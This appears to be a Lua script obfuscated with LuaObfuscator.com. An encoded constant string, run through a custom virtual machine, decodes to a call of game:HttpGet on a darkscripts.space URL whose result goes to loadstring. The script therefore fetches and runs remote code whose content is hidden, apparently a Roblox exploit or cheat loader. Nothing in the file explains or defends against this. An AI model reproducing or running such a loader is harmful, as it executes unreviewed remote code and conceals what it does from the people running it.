--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=v2(v0(v30,16));if v19 then local v115=v5(v86,v19);v19=nil;return v115;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-1)))%((5 -3)^(((v33-(1 -0)) -(v32-((1 + 1) -1))) + (878 -(282 + 595)))) ;return v87-(v87%((2257 -(1523 + 114)) -(555 + 64))) ;else local v88=(933 -(857 + 74))^(v32-(569 -(367 + 201))) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or (0 + 0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (2 -0) );v18=v18 + (1067 -(68 + 997)) ;return (v36 * (1526 -(226 + 1044))) + v35 ;end local function v23() local v37,v38,v39,v40=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (17 -13) ;return (v40 * (16778173 -(892 + 65))) + (v39 * (65653 -(32 + 85))) + (v38 * ((1127 -517) -354)) + v37 ;end local function v24() local v41=0 -0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(0 -0)) then v42=v23();v43=v23();v41=19 -(10 + (893 -(261 + 624))) ;end if (v41==(11 -8)) then if (v46==((621 -271) -(87 + 263))) then if (v45==(1080 -(1020 + 60))) then return v47 * (180 -(67 + 113)) ;else local v126=(1423 -(630 + 793)) + 0 ;while true do if (v126==(0 + 0)) then v46=439 -(145 + 293) ;v44=0 -(0 -0) ;break;end end end elseif (v46==(1506 + 541)) then return ((v45==(0 -0)) and (v47 * ((953 -(802 + 150))/((0 -0) -0)))) or (v47 * NaN) ;end return v8(v47,v46-(1855 -832) ) * (v44 + (v45/((2 + 0)^(1049 -(915 + 82))))) ;end if (v41==(5 -3)) then v46=v20(v43,13 + 8 ,128 -97 );v47=((v20(v43,41 -(4 + 5) )==(1 + 0)) and  -(1188 -(1069 + 118))) or (2 -(3 -2)) ;v41=6 -3 ;end if (v41==1) then v44=1748 -(760 + 987) ;v45=(v20(v43,1 + 0 ,(1948 -(1789 + 124)) -15 ) * (2^(32 + 0))) + v42 ;v41=1 + 1 ;end end end local function v25(v48) local v49=766 -(745 + (1434 -(447 + 966))) ;local v50;local v51;while true do if (v49==(1 + 0)) then v50=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;v49=7 -5 ;end if (v49==(0 + 0)) then v50=nil;if  not v48 then v48=v23();if (v48==(0 + (0 -0))) then return "";end end v49=1056 -(87 + (2785 -(1703 + 114))) ;end if (v49==(13 -10)) then return v6(v51);end if (v49==(2 + 0)) then v51={};for v116=2 -1 , #v50 do v51[v116]=v2(v1(v3(v50,v116,v116)));end v49=3;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 0;end)();local v90=(function() return;end)();local v91=(function() return;end)();while true do if (v89== #":") then if (v90== #" ") then v91=(function() return v92()~=(0 -0) ;end)();elseif (v90==(2 -0)) then v91=(function() return v93();end)();elseif (v90== #"xnx") then v91=(function() return v94();end)();end v95[v96]=(function() return v91;end)();break;end if (v89==(867 -(550 + 317))) then local v123=(function() return 341 -(218 + 123) ;end)();local v124=(function() return;end)();while true do if (v123~=0) then else v124=(function() return 0 -0 ;end)();while true do if (v124==(1 + 0)) then v89=(function() return  #"[";end)();break;end if (v124==(0 -0)) then v90=(function() return v92();end)();v91=(function() return nil;end)();v124=(function() return 2 -1 ;end)();end end break;end end end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99,v100,v101,v102,v103,v104,v105) local v106=(function() return 285 -(134 + 151) ;end)();local v97=(function() return;end)();local v98=(function() return;end)();while true do if ((1665 -(970 + 695))==v106) then v97=(function() return 0;end)();v98=(function() return nil;end)();v106=(function() return 1;end)();end if (v106~=(1468 -(899 + 568))) then else local v125=(function() return 0 + 0 ;end)();while true do if (v125~=(0 -0)) then else local v127=(function() return 603 -(268 + 335) ;end)();while true do if (v127~=(0 -0)) then else while true do if ((1990 -(582 + 1408))~=v97) then else v98=(function() return v99();end)();if (v100(v98, #"[", #"{")~=(572 -(426 + 146))) then else local v183=(function() return 0 + 0 ;end)();local v184=(function() return;end)();local v185=(function() return;end)();local v186=(function() return;end)();while true do if ((6 -4)==v183) then if (v100(v185, #">", #":")== #".") then v186[2 -0 ]=(function() return v103[v186[7 -5 ]];end)();end if (v100(v185,1826 -(1195 + 629) ,813 -(569 + 242) )~= #"!") then else v186[ #"nil"]=(function() return v103[v186[ #"91("]];end)();end v183=(function() return 8 -5 ;end)();end if (v183==1) then v186=(function() return {v101(),v101(),nil,nil};end)();if (v184==0) then local v192=(function() return 241 -(187 + 54) ;end)();local v193=(function() return;end)();while true do if (v192==(1251 -(721 + 530))) then v193=(function() return 780 -(162 + 618) ;end)();while true do if (v193==0) then v186[ #"asd"]=(function() return v101();end)();v186[ #"asd1"]=(function() return v101();end)();break;end end break;end end elseif (v184== #"}") then v186[ #"gha"]=(function() return v102();end)();elseif (v184==(1273 -(945 + 326))) then v186[ #"xxx"]=(function() return v102() -(2^(39 -23)) ;end)();elseif (v184== #"xnx") then local v199=(function() return 0;end)();local v200=(function() return;end)();while true do if (v199==(0 + 0)) then v200=(function() return 0;end)();while true do if (v200==(700 -(271 + 429))) then v186[ #"gha"]=(function() return v102() -((2 + 0)^(11 + 5)) ;end)();v186[ #"http"]=(function() return v101();end)();break;end end break;end end end v183=(function() return 2;end)();end if (v183~=3) then else if (v100(v185, #"gha", #"91(")== #"|") then v186[ #".com"]=(function() return v103[v186[ #"asd1"]];end)();end v104[v105]=(function() return v186;end)();break;end if (v183~=(0 -0)) then else local v188=(function() return 0 -0 ;end)();local v189=(function() return;end)();while true do if (0==v188) then v189=(function() return 1086 -(461 + 625) ;end)();while true do if (v189~=(1 + 0)) then else v183=(function() return 1289 -(993 + 295) ;end)();break;end if (v189~=(0 + 0)) then else v184=(function() return v100(v98,1638 -(1373 + 263) , #"nil");end)();v185=(function() return v100(v98, #"0313",1006 -(451 + 549) );end)();v189=(function() return 1 + 0 ;end)();end end break;end end end end end break;end end return v97,v98,v99,v100,v101,v102,v103,v104,v105;end end end end end end end;end)();local v54=(function() return function(v107,v108,v109) local v110=(function() return 0;end)();local v111=(function() return;end)();while true do if (v110==(0 -0)) then v111=(function() return 0 -0 ;end)();while true do if (v111~=(1384 -(746 + 638))) then else v107[v108-#"<" ]=(function() return v109();end)();return v107,v108,v109;end end break;end end end;end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {};end)();local v58=(function() return {v55,v56,nil,v57};end)();local v59=(function() return v23();end)();local v60=(function() return {};end)();for v68= #"|",v59 do FlatIdent_31A5A,Type,Cons,v21,v24,v25,v60,v68=(function() return v52(FlatIdent_31A5A,Type,Cons,v21,v24,v25,v60,v68);end)();end v58[ #"xxx"]=(function() return v21();end)();for v69= #".",v23() do FlatIdent_31905,Descriptor,v21,v20,v22,v23,v60,v55,v69=(function() return v53(FlatIdent_31905,Descriptor,v21,v20,v22,v23,v60,v55,v69);end)();end for v70= #".",v23() do v56,v70,v28=(function() return v54(v56,v70,v28);end)();end return v58;end local function v29(v62,v63,v64) local v65=v62[1 + 0 ];local v66=v62[(867 -(144 + 192)) -(406 + 123) ];local v67=v62[1772 -(1749 + (236 -(42 + 174))) ];return function(...) local v71=v65;local v72=v66;local v73=v67;local v74=v27;local v75=1;local v76= -1;local v77={};local v78={...};local v79=v12("#",...) -(1323 -((2002 -(239 + 514)) + 73)) ;local v80={};local v81={};for v112=0,v79 do if (v112>=v73) then v77[v112-v73 ]=v78[v112 + 1 + 0 ];else v81[v112]=v78[v112 + 1 ];end end local v82=(v79-v73) + (1146 -(466 + 679)) ;local v83;local v84;while true do v83=v71[v75];v84=v83[2 -1 ];if (v84<=4) then if ((v84<=1) or (788>2514)) then if (v84==(0 -0)) then local v129=1900 -(106 + 631 + 1163) ;local v130;local v131;local v132;local v133;local v134;while true do if (v129==((1329 -(797 + 532)) + 0)) then v130=nil;v131,v132=nil;v133=nil;v134=nil;v81[v83[1 + 1 ]]={};v75=v75 + (2 -1) ;v129=1;end if (v129==2) then v83=v71[v75];v134=v83[(4 + 1) -3 ];v133=v81[v83[117 -(4 + 0 + 110) ]];v81[v134 + 1 ]=v133;v81[v134]=v133[v83[588 -(57 + 527) ]];v75=v75 + (1428 -(41 + 468 + 918)) ;v129=(248 -142) -((1219 -(373 + 829)) + 86) ;end if ((v129==4) or (55==2387)) then v83=v71[v75];v134=v83[1 + 1 + 0 ];v131,v132=v74(v81[v134](v13(v81,v134 + (1 -0) ,v83[3])));v76=(v132 + v134) -((1506 -(363 + 1141)) -1) ;v130=166 -(122 + (1624 -(1183 + 397))) ;for v180=v134,v76 do v130=v130 + 1 ;v81[v180]=v131[v130];end v129=8 -3 ;end if ((1454<2491) and ((9 -(737 -(476 + 255)))==v129)) then v83=v71[v75];v81[v83[2 + 0 ]]=v83[1 + 2 ];v75=v75 + 1 ;v83=v71[v75];v81[v83[3 -(1 + 0) ]]=v83[68 -(30 + 35) ]~=(0 + 0) ;v75=v75 + ((941 + 317) -(1043 + 214)) ;v129=15 -11 ;end if (1==v129) then v83=v71[v75];v81[v83[1214 -(323 + 889) ]]=v64[v83[7 -4 ]];v75=v75 + 1 ;v83=v71[v75];v81[v83[582 -(361 + 219) ]]=v64[v83[323 -(53 + (1397 -(369 + 761))) ]];v75=v75 + 1 + 0 ;v129=415 -(15 + 398) ;end if ((v129==6) or (4157<=2803)) then v81[v83[984 -(18 + (2939 -(1913 + 62))) ]]();v75=v75 + (3 -2) ;v83=v71[v75];do return;end break;end if (v129==(3 + 2 + 0)) then v75=v75 + 1 + 0 ;v83=v71[v75];v134=v83[2];v81[v134]=v81[v134](v13(v81,v134 + (851 -(12 + 8 + 830)) ,v76));v75=v75 + 1 ;v83=v71[v75];v129=6;end end else v81[v83[2 + 0 ]]={};end elseif (v84<=(5 -3)) then local v136=v83[128 -(116 + 10) ];v81[v136]=v81[v136](v13(v81,v136 + 1 + 0 ,v76));elseif (v84>(741 -(542 + (2129 -(565 + 1368))))) then v81[v83[(5 -2) -1 ]]();else v81[v83[1 + (1 -0) ]]=v83[2 + 1 ]~=(0 + 0) ;end elseif (v84<=(15 -9)) then if ((4853>=2982) and (v84==(12 -7))) then v81[v83[1553 -(1126 + 425) ]]=v64[v83[3]];else v81[v83[407 -(118 + 287) ]]=v83[(41 -30) -8 ];end elseif ((4134>3357) and (v84<=(1128 -((356 -(64 + 174)) + 1003)))) then local v142=0 -0 ;local v143;local v144;while true do if (v142==((54 + 324) -(142 + 235))) then v81[v143 + (4 -3) ]=v144;v81[v143]=v144[v83[1 + 3 ]];break;end if (v142==(977 -(553 + 424))) then v143=v83[3 -(1662 -(1477 + 184)) ];v144=v81[v83[(3 -0) + 0 ]];v142=1 + 0 ;end end elseif (v84==(5 + 3)) then do return;end else local v146=v83[1 + 1 + 0 ];local v147,v148=v74(v81[v146](v13(v81,v146 + 1 + 0 ,v83[6 -3 ])));v76=(v148 + v146) -(2 -1) ;local v149=0 -0 ;for v177=v146,v76 do v149=v149 + (857 -(564 + 292)) + 0 ;v81[v177]=v147[v149];end end v75=v75 + (4 -(3 -0)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403303Q00682Q7470733A2Q2F6461726B736372697074732E73706163652F736372697074732F306333643164316132342E6C7561000A9Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
